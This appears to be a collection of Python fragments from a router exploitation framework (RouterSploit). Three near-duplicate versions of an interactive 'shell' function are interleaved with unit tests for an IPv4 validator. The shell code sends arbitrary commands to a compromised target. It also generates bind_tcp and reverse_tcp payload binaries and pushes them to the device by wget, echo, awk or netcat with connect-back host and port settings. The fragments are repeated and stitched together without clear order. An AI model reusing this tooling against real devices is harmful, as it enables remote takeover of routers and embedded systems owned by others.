def shell(exploit, architecture="", method="", **params): while 1: while not printer_queue.empty(): pass cmd = raw_input("cmd > ") if cmd in ["quit", "exit"]: return c = cmd.split() if len(c) and (c[0] == "bind_tcp" or c[0] == "reverse_tcp"): options = {} if c[0] == "bind_tcp": try: options['technique'] = "bind_tcp" options['rhost'] = validators.ipv4(exploit.target) options['rport'] = int(c[1]) options['lhost'] = c[2] options['lport'] = int(c[3]) except: print_error("bind_tcp <rport> <lhost> <lport>") payload = bind_tcp(architecture, options['rport']) elif c[0] == "reverse_tcp": try: options['technique'] = "reverse_tcp" options['lhost'] = c[1] options['lport'] = int(c[2]) except: print_error("reverse_tcp <lhost> <lport>") payload = reverse_tcp(architecture, options['lhost'], options['lport']) communication = Communication(exploit, payload, options) if method == "wget": communication.wget(binary=params['binary'], location=params['location']) elif method == "echo": communication.echo(binary=params['binary'], location=params['location']) elif method == "awk": communication.awk(binary=params['binary']) elif method == "netcat": communication.netcat(binary=params['binary'], shell=params['shell']) else: print_info(exploit.execute(cmd))
def test_ipv4_no_inet_pton_valid_address(self, mock_inet_pton): address = "127.0.0.1" mock_inet_pton.side_effect = AttributeError self.assertEqual(validators.ipv4(address), "127.0.0.1")
def test_ipv4_invalid_address_3(self): """ IP address with extra segment """ address = "127.0.0.123.123" with self.assertRaises(OptionValidationError): validators.ipv4(address)
def test_ipv4_invalid_address_2(self): """ IP address with 4 digit segment. """ address = "127.0.0.1234" with self.assertRaises(OptionValidationError): validators.ipv4(address)
def test_ipv4_invalid_address_1(self): """ IP address with segment out of range. """ address = "127.256.0.1" with self.assertRaises(OptionValidationError): validators.ipv4(address)
def test_ipv4_valid_address(self): address = "127.0.0.1" self.assertEqual(validators.ipv4(address), address)
def test_ipv4_strip_scheme_2(self): address = "ftp://127.0.0.1" self.assertEqual(validators.ipv4(address), "127.0.0.1")
def shell(exploit, architecture="", method="", payloads=None, **params): path = "routersploit/modules/payloads/{}/".format(architecture) payload = None options = [] if not payloads: payloads = [ f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py" ] print_info() print_success( "Welcome to cmd. Commands are sent to the target via the execute method." ) print_status( "Depending on the vulnerability, command's results might not be available." ) print_status( "For further exploitation use 'show payloads' and 'set payload <payload>' commands." ) print_info() while 1: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format( payload._Exploit__info__['name']) cmd = raw_input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": print_status("Available payloads:") for payload_name in payloads: print_info("- {}".format(payload_name)) elif cmd.startswith("set payload "): c = cmd.split(" ") if c[2] in payloads: payload_path = path.replace("/", ".") + c[2] payload = getattr(importlib.import_module(payload_path), 'Exploit')() options = [] for option in payload.exploit_attributes.keys(): if option not in ["output", "filepath"]: options.append([ option, getattr(payload, option), payload.exploit_attributes[option] ]) if payload.handler == "bind_tcp": options.append([ "rhost", validators.ipv4(exploit.target), "Target IP address" ]) if method == "wget": options.append( ["lhost", "", "Connect-back IP address for wget"]) options.append( ["lport", 4545, "Connect-back Port for wget"]) else: print_error("Payload not available") elif payload is not None: if cmd == "show options": headers = ("Name", "Current settings", "Description") print_info('\nPayload Options:') print_table(headers, *options) print_info() elif cmd.startswith("set "): c = cmd.split(" ") if len(c) != 3: print_error("set <option> <value>") else: for option in options: if option[0] == c[1]: try: setattr(payload, c[1], c[2]) except Exception: print_error("Invalid value for {}".format( c[1])) break option[1] = c[2] print_success("{'" + c[1] + "': '" + c[2] + "'}") elif cmd == "run": data = payload.generate() if method == "wget": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) if communication.wget() is False: continue elif method == "echo": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) communication.echo() elif method == "generic": params['exec_binary'] = data communication = Communication(exploit, "", options, **params) if payload.handler == "bind_tcp": communication.bind_tcp() elif payload.handler == "reverse_tcp": communication.reverse_tcp() elif cmd == "back": payload = None else: print_status("Executing '{}' on the device...".format(cmd)) print_info(exploit.execute(cmd))
def test_ipv4_no_inet_pton_invalid_address_1(self, mock_inet_pton): """ IP address with segment out of range. """ address = "127.256.0.1" mock_inet_pton.side_effect = AttributeError with self.assertRaises(OptionValidationError): validators.ipv4(address)
def test_ipv4_no_inet_pton_invalid_address_3(self, mock_inet_pton): """ IP address with extra segment """ address = "127.0.0.123.123" mock_inet_pton.side_effect = AttributeError with self.assertRaises(OptionValidationError): validators.ipv4(address)
def shell(exploit, architecture="", method="", payloads=None, **params): path = "routersploit/modules/payloads/{}/".format(architecture) payload = None options = [] if not payloads: payloads = [f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"] print_info() print_success("Welcome to cmd. Commands are sent to the target via the execute method.") print_status("Depending on the vulnerability, command's results might not be available.") print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.") print_info() while 1: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Exploit__info__['name']) cmd = raw_input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": print_status("Available payloads:") for payload_name in payloads: print_info("- {}".format(payload_name)) elif cmd.startswith("set payload "): c = cmd.split(" ") if c[2] in payloads: payload_path = path.replace("/", ".") + c[2] payload = getattr(importlib.import_module(payload_path), 'Exploit')() options = [] for option in payload.exploit_attributes.keys(): if option not in ["output", "filepath"]: options.append([option, getattr(payload, option), payload.exploit_attributes[option]]) if payload.handler == "bind_tcp": options.append(["rhost", validators.ipv4(exploit.target), "Target IP address"]) if method == "wget": options.append(["lhost", "", "Connect-back IP address for wget"]) options.append(["lport", 4545, "Connect-back Port for wget"]) else: print_error("Payload not available") elif payload is not None: if cmd == "show options": headers = ("Name", "Current settings", "Description") print_info('\nPayload Options:') print_table(headers, *options) print_info() elif cmd.startswith("set "): c = cmd.split(" ") if len(c) != 3: print_error("set <option> <value>") else: for option in options: if option[0] == c[1]: try: setattr(payload, c[1], c[2]) except Exception: print_error("Invalid value for {}".format(c[1])) break option[1] = c[2] print_success("{'" + c[1] + "': '" + c[2] + "'}") elif cmd == "run": data = payload.generate() if method == "wget": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) if communication.wget() is False: continue elif method == "echo": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) communication.echo() elif method == "generic": params['exec_binary'] = data communication = Communication(exploit, "", options, **params) if payload.handler == "bind_tcp": communication.bind_tcp() elif payload.handler == "reverse_tcp": communication.reverse_tcp() elif cmd == "back": payload = None else: print_status("Executing '{}' on the device...".format(cmd)) print_info(exploit.execute(cmd))